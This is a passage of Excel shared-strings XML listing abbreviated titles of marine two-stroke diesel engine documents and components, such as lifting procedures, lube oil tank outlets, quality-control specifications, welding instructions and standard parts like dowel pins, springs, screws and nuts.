    <t>LIFTING OF RECEIVER AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING OF CHAINWH.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-CRANKSHAFT FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.-CRANKSHAFT AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISM.TOOL F.BEARINGSHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF TOOLS PANELS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 1 OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 2 OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 3 OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 4 OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL BOTTOM TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL OUTLET,DETAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL LEVEL, TRIM AND LIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAYOUT-FUEL OIL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLINE-FUEL OIL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SYSTEM-FUEL OIL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.DIAGRAM-FUEL OIL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAYOUT-CAMSHAFT L.O.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLINE-CAMSHAFT L.O.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SYST.-CAMSH.L.O.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLINE-DRAIN TANK UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SYST.-DRAIN T.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SYSTEM-F.O. MIX.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLINE-CLEANING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE SYSTEM,F.W.COOL.UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TORSIOGRAPHARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING FORCES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING TENSION DATA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING INSTRUCTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VIBRATION LIMITS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STATIC CRANKSHAFT LOAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOP BRACING INSTRUC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSH. MODEL FOR ALIGNM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Installation/maintenance guide</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.ROOM HEIGHT JIB CRANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.ROOM CRANE CAPACITY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.ARR.BULK CARR.2-ST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.ARR.CONTAINER 2-ST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.ARR.FERRY 2-STROKE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENG.ARR.FERRY 4-STROKE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERHAUL.TOOLS-CRANE ETC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EL.PROD. AUX MACH., PTO</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS/PTI + PTO/PTI</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SILENCER+EXH.SYST.(NOISE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ECONOMY INVESTIGATIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPARISON STEAM/DIESEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPARISON DIESEL/DIESEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UNITIZATION INVESTIGATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCR CATALYTIC REACTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Two stroke air intake</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS ENGINE SEATINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF HOLDING-DOWN BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MACH.OF TOPPLATE F.CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Info Number not assigned</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC main starting valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS FOR STARTING VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GENERAL CLASS REQUIREMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CaMShaft housing cast</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGE FRICTION COATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Prep of Specimen, Coated Comp</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QI-S WELDING INSTRUCTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS Welded cylinder frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC Cast plate cyl. frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING FOR TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR HY.EXH.ACTUATOR P.TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR HYDR.EXH.ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FIVA Valve 1.st approval</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Methods for NDT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI F.CHAIN DRIVE UP.PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MI FOR CONECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of frame box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of bedplate</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of connect.rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of piston rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of crosshead</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of guide shoe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of cyl. liner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of cyl. frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of cyl. cover</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of piston crown</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of exhaust valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of exh.valv.housing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of staybolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of exh &amp; fuel caMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main dim. of chain wh. frame</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAINFRAMECHECK+MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC EXHAUST RECEIVER,WELD.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>C.P. CONVERSION PROCEDURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SA FOR FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SA FOR FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR FRAMEBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FOR CYLLINDER COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS CONNECTING ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS Cyl. frame nodular Cast</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC Cyl. frame nodular Cast</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection sheet, 4-stroke</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR BEARING LOAD MEAS.MC-S</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REANING BEDPLATE+FRAMEBOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGN CROSSHEAD GUIDES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT LONG STAY BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS.OF CHAIN - FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR TEST DEVICE ELFI/ELVA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RE-ALIGNM. OF GUIDE BARS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST OIL AND WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RP Fuel/Exhaust caMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Mounting of  top section</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TURBOCHARGER-OUTLINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCING DRAWING-ROTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PICK-UP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROJECT ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHARG.AIR COOL. DIMENSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COLL.HOUSING-WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLER BUILT-IN CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS RELIEF VALVE CRANKCASE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR GRAY CASTINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC AXIAL VIBRATION DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC SAMPL. CHEMICAL COMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Vibration test specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QVAL.INST. CYL.LINERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS WELD CRANKSH.MC,S34MNV</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Acc. first time appr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HP Fuel Oil Pipes, Connecting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FORGED CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CENTRIF.CAST CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS Cyl. Liner, Final Inspection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC CYL LINER FIRST TIME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS. FOR PISTON RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS Piston Rings, Cermet Coating</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS Piston Rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC FORGED CYLINDER COVERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RP CRANK THROW REPLACEM.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS CRANK THROW SHOT BLAST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC WHITE METAL FIRST TIME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS BEARING PB-BASED LAYER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR Bearing "HOYT" Cloride</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Coating proces</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS "UT" BOOSTER HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAME HARDEN. PISTON RODS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PS WELD CRANKSH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDPR.SPEC PISTONC.W.RIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD CLADD. LGB PISTON CR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOX INT.WELD.F+P TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOX FOR.WELD.F+P TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAMEBOX AFT.WELD.F+P TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE INT.WELD.F+P TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BEDPLATE AFT.WELD.F+P TOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC UST REPORT FOR PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIM.INSPECTION OF BLANKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIM.INSP.OF FINISHEDITEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADM.SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH.SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Supplier directory</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QC Water mist catcher</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS Water mist catcher</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Cleaning, lub.oil bores</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>QS HCU clean &amp; inspection</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PR CABLING &amp; CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STATION LAYOUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCR LAYOUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCR SYSTEM LAYOUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shop trial/site trial report</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Geotech. Inves., gen. guidelines</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBES, FUELS, AIR SUPPLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guiding Biofuel Specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Specification of Lub. Oil Tank</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Measuring Table, Foundation Bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Information, Epoxy Chocks</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Data Log for Epoxy Casting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Data Log for Epoxy Settings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GLUES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM FOR PIPE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTM.OF FUEL OIL PRES.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>X-RAY EXAMINING ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXT. -SCAV.AIR SPACE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALTERATION-SUNDRY PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAC.OF SUPPORT-FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPES-INSULATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF PARTS STD.LIB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF THREE-WAY COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.O.RETURN PIPE-UNCOOL.V.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF STRAIGHT COCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF GAUGE CONNECT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BREATHING  FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT FOR AMOT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WIRE FITTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT, WITH TOOL END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN.CYLINDRICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOWEL PIN,W.SPLIT HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, w. internal th</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, cyl. w. slot</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, tapered, plain</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, tapered w.ext.thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, tapered w. int.thread</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, tapered w. slot</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, tapered, special</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Dowel pin, cyl. w. spring hole</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE PIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLAW COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE COUPLING,PARTS FOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ball joint</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SINGLE LEVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SINGLE LEVER-FORKED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER-SUNDRY TYPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE FOR WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE-SUNDRY TYPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, BALL HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTH BELT DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tooth belt disc w. flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN LINK-OUTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN LINK-INTERMEDIATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIN FOR CHAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PEAR SHAPED RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN LINK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>V BELT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOTH BELT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING,COMPR.RIGHT-HAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE SPRING,LEFT-HAND</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring, compr. conical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spring, compr., rectangular sect</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING,EXTENTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THREAD INSERT-P.THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLT-CHEESE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RITTED BOLT,HEXAGON HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Guide pin w. fitted head</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW,HEXAGON HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLLOW POINTED SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST+SET+POINTED SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREWS WITH SPECIAL HEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRATERSCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw, Thrust/Set/Pointed</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screw, cross recessed drive</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW,CHEESE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-CHEESE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW-SELF TAPPING W.SLOT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCREW, WING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CORE PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED STUD,THREAD BOTH ENDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD,REDUCED SHANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD,THREAD BOTH ENDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTENSION STUD F. HYDRAUL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR PIN WITH THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR PIN WITHOUT THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD WITH RING GROOVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD, THREAD BOTH END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASHER FACED HEXAGON NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON CAP NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON NUT WITH COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, SPHERICAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON UNION NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT, HEXAGON SELF-LOCKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON NUT-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR HOOK-WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT,ROUND W.TOMMY BAR HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND NUT-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT,SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Test block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLEEVE-CYL.WITH COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
